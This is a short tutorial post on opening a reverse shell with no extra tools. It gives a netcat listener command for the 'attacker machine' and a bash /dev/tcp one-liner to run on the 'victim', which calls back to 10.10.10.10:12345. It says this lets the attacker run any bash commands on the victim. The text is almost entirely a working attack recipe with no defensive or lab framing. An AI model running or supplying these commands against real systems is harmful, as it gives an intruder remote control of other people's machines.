remote shell without any tools
Here's a method for opening up a TCP connection from one host to another without needing to install any tools.
From the attacker machine, wait for a connection
Wait for connections
nc -nlp 12345
From the victim
Call home
/bin/bash -i > /dev/tcp/10.10.10.10/12345 0<&1 2>&1
The victim code will open up a connection the the attacker, allowing the attacker to run whatever bash commands he wants. All this without installing anything on the victim. Spooky.